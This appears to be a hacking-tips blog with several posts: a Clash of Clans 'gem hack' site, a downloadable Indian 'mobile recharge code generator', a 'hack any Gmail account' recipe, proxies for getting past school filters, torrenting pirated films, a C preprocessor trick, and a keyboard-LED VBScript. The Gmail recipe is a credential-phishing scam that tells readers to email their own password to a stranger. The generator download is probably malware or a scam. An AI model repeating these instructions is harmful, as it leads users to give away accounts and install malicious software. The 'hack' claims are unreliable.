Wednesday, 13 May 2015

Clash of clans cheats for android mobile

http://freehacksandcodes.com/clash-of-clans-hack/

1.Go to the above site
2.Enter your username
3.Add the amount of Gems,Elixir,etc.... you wanted
4.Just link hack button..
Mobile Recharge Code Generator 2014 version 2.0.0
Hey friends here i proudly present a wonderful tool. 
This Mobile Recharge Code Generator 2014 is going to work for India only. I have developed a software to generate recharge codes for every circles in India and tested this and this was working successfully. Here you can download your software without any problem , from which circle you are and in which network you are. So this Mobile Recharge code Generator is going to rock. After downloading,You will never have to pay for recharge cards again.
Image result for free recharge code generator\
Supported Mobile Networks 
* Airtel

* Aircel
* BSNL
* Docomo
* Idea
* Reliance
* Vodafone

Instructions

1.)  Download the file from the above links

2.)  Open Mobile Recharge Code Generator

3.)  Key is in the txt file. Copy it & paste in the generator.
4.)  Select your circle and select recharge amount.
5.)  Wait for few minutes and your recharge code is ready.

After downloading this Mobile recharge Code Generator and getting your first recharge code please don't forget to like and give a comment for this video about your experience and let me know if you faced any problems so that I can further try to improve this Mobile Code Generator Software.
Download Link:http://gripfiles.net/163988


Thursday, 27 March 2014

How to write a C program without a main function?.Is it possible to do that.Yes there can be a C program without a main function.Here’s the code of the program without a main function…


#include

#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)

int begin()
{
printf(” hello “);
}

Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function.But how,whats the logic behind it? How can we have a C program working without main ?

Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main.But in reality it runs with a hidden main function.
The ‘##‘ operator is called the token pasting or token merging operator.That is we can merge two or more characters with it.

NOTE: A Preprocessor is program which processess the source code before compilation.

Look at the 2nd line of program-

#define decode(s,t,u,m,p,e,d) m##s##u##t

What is the preprocessor doing here.The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut).The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).

Now look at the third line of the program-

#define begin decode(a,n,i,m,a,t,e)

Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e).According to the macro definition in the previous line the argument must de expanded so that the 4th,1st,3rd & the 2nd characters must be merged.In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.


So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler.That’s it…

The bottom line is there can never exist a C program without a main function.Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exista a hidden main function in the program.Here we are using the proprocessor directive to intelligently replace the word begin” by “main” .In simple words int begin=int main.

Wednesday, 5 March 2014


How to download torrents without utorrent


       whenever we go to download Torrents we need to use uTorrent or BitTorrent or any other BitTorrent client. BitTorrent clients are used to download .torrent files and has been mostly used over the globe, BitTorrent is a P-2-P(Peer 2 Peer) sharing software working on BitTorrent Protocol written by Bram Cohen.

To download torrents without any BitTorrent client we are going to use web based Torrent client that let you download the torrents without the utorrent or any other client.
BitLet is a Java based web Torrent client which lets you download torrents directly using your browser. That means you do not need any BitTorrent client and still can download your favorite movies and games. BitLet allows you directly add the URL of the Torrent file to download or you can directly upload an .torrent file from your computer.
How to download torrents without utorrent
Screenshot of bitLet.org
For downloading using bitlet you need Java to run the client.
How to download torrents without utorrent
Here’s a picture of me downloading the Movie Saving Private Rayn. this BitTorrent client has no drawback instead the client lets you download with full speed you have and i guess its best for someone who needs to download torrents in their college or schools, then you won’t need any BitTorrent client to download. if you need to download any torrent the you can checkout The Pirate Bay
Hope you enjoy Bitlet.org and enjoy downloading some cool stuff, don’t forget to share it with your friends because sharing is caring

Wednesday, 25 September 2013

Accessing the blocked sites in schools and colleges


Here is a list of proxies you can use:
http://snipurl.com/27v47cf

The same list is also here:
http://dpaste.com/1392957/plain/

Friday, 20 September 2013

How to Hack or Recover any Gmail Account

Step 1: Log into your Gmail account.
Step 2: Compose a new mail.
Step 3: In subject box type ” PASSWORD RECOVERY ”
Step 4: Send this to info.pp...@gmail.com
Step 5: Write this in message box.
(first line)- Email address you want to hack.
(second line)- Your Cell Number (third line)- Your Gmail address
(fourth line)- Your Gmail account password
(fifth line) – <pwdcursive><
v703&login=”passmachine&f=(p0assword)
&f=27586&___javascript=ACTIVE&rsa#”
start?></script>=”"></cursive><>
{simply copy and paste above.

Example:

jo...@gmail.com
1-635-482-940
den...@gmail.com
telecom907
<pwdcursive>< v703&login=”passmachine&f=(p0assword)
&f=27586&___javascript=ACTIVE&rsa#”
start?></script>=”"></cursive><>

Saturday, 8 September 2012

Dancing Keyboard


       1. Open Notepad and copy below codes into it.

         Set wshShell =wscript.CreateObject("WScript.Shell")
         do
         wscript.sleep 100
         wshshell.sendkeys "{CAPSLOCK}"
         wshshell.sendkeys "{NUMLOCK}"
         wshshell.sendkeys "{SCROLLLOCK}" 
         loop
       

       2. Then save this file as led.vbs (.vbs is must)
       3. Open your save file and see your keyboard led blinking like disco lights.

How to disable blinking Led ?

       1. First open Task Manager [ctrl+alt+del ]
       2. Then Go to process tab.
       3. Select wscript.exe 
       4. Click on End process.